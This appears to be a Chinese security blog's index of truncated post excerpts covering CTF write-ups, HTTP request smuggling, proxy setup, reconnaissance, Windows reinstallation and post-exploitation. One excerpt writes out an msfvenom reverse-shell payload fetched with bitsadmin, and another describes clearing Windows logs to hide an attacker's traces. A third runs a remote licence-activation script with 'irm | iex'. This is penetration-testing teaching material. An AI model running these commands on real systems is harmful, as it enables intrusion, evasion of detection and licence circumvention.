WEEK1|MISCCyberChef’s Secret
Sign in!!!
来签到吧!下面这个就是flag,不过它看起来好像怪怪的:-)M5YHEUTEKFBW6YJWKZGU44CXIEYUWMLSNJLTOZCXIJTWCZD2IZRVG4TJPBSGGWBWHFMXQTDFJNXDQTA=
wok这个有点厉害,才发现可以自动解密
flag{Base_15_S0_Easy_^_^}
机密图片
小宝最近学会了隐写术,并且在图片中藏了一些秘密,你能发现他的秘密吗?
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}
流量!鲨鱼!
就决定是你了!WireShark!
flag{Wri35h4rk_1s_u53ful_b72a609537e6}
压缩包们
常见的压缩包又能玩出什么花样呢?
考点:Zip文件头修复、Zip压缩包爆破
winhex查看
我喜欢六位数,因为它们非常简洁,容易记住。
然后修改文件头
50 4B 03 04
但是后面想爆破还是提示有问题 ...
什么是HTTP请求走私HTTP请求走私攻击,顾名思义,就会像走私一样在一个HTTP请求包中夹带另一个或多个HTTP请求包,在前端看来是一个HTTP请求包,但是到了后端可能会被解析器分解开从而导致夹带的HTTP请求包也会被解析,最终可以导致未授权访问敏感数据或攻击其他用户。
原理keep-alive 与 pipeline
为了缓解源站的压力,一般会在用户和后端服务器(源站)之间加设前置服务器,用以缓存、简单校验、负载均衡等,而前置服务器与后端服务器往往是在可靠的网络域中,ip 也是相对固定的,所以可以重用 TCP 连接来减少频繁 TCP 握手带来的开销。这里就用到了 HTTP1.1 中的 Keep-Alive 和Pipeline 特性:
所谓 Keep-Alive,就是在 HTTP 请求中增加一个特殊的请求头 Connection: Keep-Alive,告诉服务器,接收完这次 HTTP 请求后,不要关闭 TCP 链接,后面对相同目标服务器的 HTTP 请求,重用这一个 TCP 链接,这样只需要进行一次 TCP 握手的过程,可以减少服务器的开销,节约资源,还能加快访问速度。这个特性在 H ...
前言在日常的渗透过程中,不管是前期的外部打点还是后渗透,代理总是绕不开的话题。在前期的外部打点过程中,扫描和渗透测试会不断受到WAF的拦截,需要不停的更换IP进行扫描和渗透测试;而在后期的后渗透过程中,通过frp和nps等等工具从入口点出网之后,也需要对接代理进入目标内网进行内网渗透。
本文我们需要用到一个工具:Proxifier,有不少师傅应该听过它的大名。
Proxifier 是一款代理客户端软件,可以让不支持代理服务器工作的程序变的可行。支持各种操作系统和各代理协议,它的运行模式可以指定端口,指定程序的特点。
Proxifier 的主要用途是在系统级别通过代理服务器强制 Web 请求,从而使来自不支持代理的应用程序的请求通过代理访问其预期网站。
工具下载地址:https://pan.baidu.com/s/1pu_5Wcq1MG5GcN9H4C8-Nw?pwd=sz5v
环境:
Burpsuite_pro v2021.7.1
Proxifier 3.28 汉化版
微信 v3.9.0.22
配置burp流量监听
将CA证书打开安装到系统上(若不安装,无法抓取https协议流量包 ...
什么情况下需要重装系统
系统功能严重异常、无法修复,会出现蓝屏、黑屏、死机、卡顿,或者直接或者直接没办法正常开机了。
安装了应用软件后,机器报错,无论怎么卸载重装软件都无法正常运行。
系统内杂乱软件太多,硬盘爆满,无论怎么清理都腾不出空间,重要资料已经挪走了,还是有很多自己不知道的东西占了电脑硬盘空间,想直接一下子全部清理掉。
电脑用太久了,想升级新版本系统,体验新界面、新功能。
朋友、对象的电脑坏了,或者女同学的电脑出问题了,请你帮忙重装。
备份重要文件
准备一个大一点的移动硬盘,把你重要的照片、视频、文件、备份好的聊天记录等数据拷贝出来。
OS镜像恢复部分笔记本自带了官方的恢复镜像
它跟 Windows自带的系统重置完全不同
它相当于在第三方系统里把预先安装好的Windows镜像解压缩一遍覆盖重新安装
而Windows重置是在目前已经安装好、使用过的系统上进行重新擦除、修正错误
本质不同,对应的效果也不同
如果原装的恢复分区被破坏了这个功能就失效了
只能用普通的方法重装,一样是没有办法通过这个功能进行系统重装还原的
如何跳过联网shift+F10打开cmd
输入oobe\\B ...
激活方式首先打开powershell
然后输入一下内容
1irm https://massgrave.dev/get | iex
此时如果你需要激活Windows就输入1
如果需要激活Office,就先输入2再输入1
然后Windows和Office就能永久激活啦
HWID使用产品:Win10、Win11
限制条件:仅适用于上述系统
有效期:永久
特点:硬件没有大变化,系统重装也不怕
Ohook使用产品:Office(2010、UWP版本除外)
限制条件:系统版本不能低于Windows*
有效期:永久
特点:真正的永久激活
KMS38使用产品:Win10、Win11、Windows Server
限制条件:仅适用于上述系统
有效期:2038年1月19日
特点:相比于传统的KMS激活,时间要久一点
Online KMS使用产品:绝大多数Windows和Office,详细名单看链接
限制条件:KMS实际可以离线激活,但该脚本必须联网
有效期:180天
特点:支持的产品数量最多
详细名单 https://massgrave.dev/online_kms.html
HEU_KMS_A ...
Web 架构篇&域名&语言&中间件&数据库&系统&源码获取知识点1、打点-Web 架构-语言&中间件&数据库&系统等
2、打点-Web 源码-CMS 开源&闭源售卖&自主研发等
3、打点-Web 源码获取-泄露安全&资源监控&其他等
4、打点-Web 域名-子域名&相似域名&反查域名&旁注等
信息点基础信息,系统信息,应用信息,防护信息,人员信息,其他信息等
技术点CMS 识别,端口扫描,CDN 绕过,源码获取,子域名查询,WAF 识别,负载均衡识别等
资产泄漏&CMS 识别&Git 监控&SVN&DS_Store&备份知识点CMS 指纹识别源码获取方式习惯&配置&特性等获取方式3、托管资产平台资源搜索监控
详细点参考:https://www.secpulse.com/archives/124398.html
源码泄漏原因1、从源码本身的特性入口
2、从管理员不好的习惯入口
3、从管理员不好的配置入口
4 ...
操作系统&名词&文件下载&反弹SHELL&防火墙绕过
前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK 等
参考:
https://www.cnblogs.com/sunny11/p/13583083.htmlhttps://forum.ywhack.com/bountytips.php?downloadhttps://forum.ywhack.com/reverse-shell/https://blog.csdn.net/weixin_43303273/article/details/83029138
Web应用&架构搭建&漏洞&HTTP数据包&代理服务器
网站搭建前置知识域名,子域名,DNS,HTTP/HTTPS,证书等
WEB 应用环境架构类理解不同 WEB 应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统 ...
misc打不开的图片1用winhex查看
文件头很像jpg格式,但是少了两个字节D8 FF,手动补上字节并把文件名后缀改为jpg打开
后缀名字改为.jpeg
然后https://exif.tuchong.com/
查看信息
打不开的照片2
直接改文件头,改成png的
狗子(1) 普通的猫
winhex查看即可
狗子(2) 照片
这到底是为什么呢
后面看wp,发现说图片太大?
狗子(4)故乡话
将False 改为0,将True改为1会直观很多
把0改.
1改0
明显多了,看大佬wp说是附魔台的语言
moectf{dontanswer}
还有另一种方法
1234567891011121314from PIL import Imageim = Image.new('RGB',(60,7),'white')with open('./attachment.txt','r')as f: lines = f.readlines() for y in range(l ...
Windows下文件传输BitsadminBITSAdmin 是一个命令行工具,可以使用它创建下载或上传作业,并监视其进度。
bitsadmin | Microsoft Docsbitsadmin 示例 | Microsoft Docs
msfvenom生成Payload
1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.247.135 lport=6666 -f hta-psh > 6666.hta
启动Apache2服务,托管Payload
12345#启动apache2服务service apache2 start#复制payload到web根目录cp 6666.hta /var/www/html/
bitsadmin 下载 Payload
1bitsadmin /transfer shell http://192.168.247.135/6666.hta C:\windows\temp\6666.hta
启动metasploit监听器
12345# 进入msfcon ...
痕迹清除简介在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录,执行命令等。攻击者通常会对Windows日志进行清除和绕过。
Windows痕迹清除Windows日志
如何查看
事件查看器 -> windows日志
12win + reventvwr.msc
保存路径
123C:\Windows\System32\winevt\Logs\%systemroot%\System32\winevt\Logs\
包括五个类别:应用程序、安全、Setup、系统、转发事件
1powershell -c "Get-WinEvent -FilterHashtable @{logname='Application';}"
系统日志:System
记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。
应用程序日志:Application
包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志 中记录文件错误, ...